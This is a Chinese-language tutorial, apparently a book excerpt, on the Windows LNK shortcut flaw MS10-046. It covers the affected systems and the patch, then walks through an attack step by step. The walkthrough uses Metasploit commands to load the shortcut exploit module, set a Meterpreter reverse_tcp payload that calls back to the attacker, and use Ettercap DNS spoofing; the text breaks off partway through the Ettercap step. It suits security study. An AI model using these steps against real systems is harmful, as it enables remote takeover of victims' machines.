漏洞攻击.docVIP

1、漏洞定义 Windows支持使用快捷方式或LNK文件。LNK文件是指向本地文件的引用，点击LNK文件与点击快捷方式所指定的目标具有相同的效果。 Windows没有正确地处理LNK文件，特制的LNK文件可能导致Windows自动执行快捷方式文件所指定的代码。这些代码可能位于USB驱动、本地 或远程文件系统、光驱或其他位置，使用资源管理器查看了LNK文件所在位置就足以触发这个漏洞。默认下Windows启动了自动加载和自动播放功能，因此 在连接可移动设备（如USB闪存）后Windows会自动打开资源管理器。其他显示文件图标的应用也可用作这个漏洞的攻击载体。受影响的Windows系统如下表1所示： 表1 漏洞名称 受影响的Windows系统类型 MS10-046 Microsoft Windows XP SP3 Microsoft Windows XP SP2 Microsoft Windows?Vista?SP2 Microsoft Windows?Vista?SP1 Microsoft Windows Server 2008 Microsoft Windows Server 2008 SP2 Microsoft Windows Server 2008 R2 Microsoft Windows Server 2003 SP2 Microsoft Windows 7 2、关于补丁 Microsoft已经为此发布了一个安全公告（MS10-046）以及相应补丁: MS10-046：Vulnerability in Windows Shell Could Allow Remote Code Execution (2286198)，其详细说明文档的链接如下： /china/technet/security/bulletin/MS10-046.mspx 此安全更新解决了Windows Shell 中一个公开披露的漏洞。 如果显示特制的快捷方式图标，则该漏洞可能允许远程执行代码。成功利用此漏洞的攻击者可以获得与本地用户相同的用户权限。除了使用Windows系统自带的自动更新来升级补丁外，也可以使用360安全卫士之类的第三方工具来实现。 ◆攻击操作 接下来，我们开始使用Metasploit3进行溢出攻击，下面为详细步骤。 步骤1：进入Metasploit，载入攻击代码。 作为攻击者而言，首先是进入Metasploit。除了从菜单上直接点选进入Metasploit外，我们也可以在图形界面下打开任意一个Shell，直接输入msfconsole命令来进入Metasploit。如下图-1所示，可以看到当前包含代码数量、参数状态及最新版本等。 图-1 命令如下： search ms10_046 回车后即可看到如下图-2所示的搜索结果，显示存在一个名为ms10_046_shortcut_icon_dllloader的可用攻击代码。接下来，就可以载入该攻击代码，具体命令如下： use windows/browser/ms10_046_shortcut_icon_dllloader 回车后如下图所示，就载入了该攻击代码。 图-2 在使用一个攻击代码前，需要先查看其必需的设置参数有哪些，所以先要输入如下命令： show options 回车后即可看到该攻击代码的设置参数，如下图-3所示，在图中间可以看到SRVHOST、SRVPORT、URIPATH这三个参数是必须的，其中，SRVPORT和URIPATH是已经默认设置好的。 图-3 步骤2：在Metasploit3上配置攻击代码。 既然知道了必需的配置参数，接下来就可以使用set命令来依次配置参数。其中，设置溢出有效载荷为反向溢出，而为了使用到Metasploit中的具备强化Shell功能的Meterpreter，所以设置为PAYLOAD为windows/metepreter/reverse_tcp此外，由于后面攻击者还要使用ettercap对目标进行DNS欺骗攻击，所以攻击者应要将反弹端口的目的地设置为自身IP，即设置LHOST为自身IP。最后，使用exploit执行溢出。具体命令如下： set?? SRVHOST?? 攻击者自身IPset?? PAYLOAD?? windows/meterpreter/reverse_tcpset?? LHOST?? 攻击者自身IPexploit 图-4 步骤3：配置EtterCap，执行DNS欺骗攻击。 关于DNS欺骗攻击会使用到Ettercap，这款工具的操作可以参考本书12章12.1节内容。不过在使用Ettercap进行DNS欺骗攻击之前，我们先修改一下Ettercap的dns模块，即修改/usr/share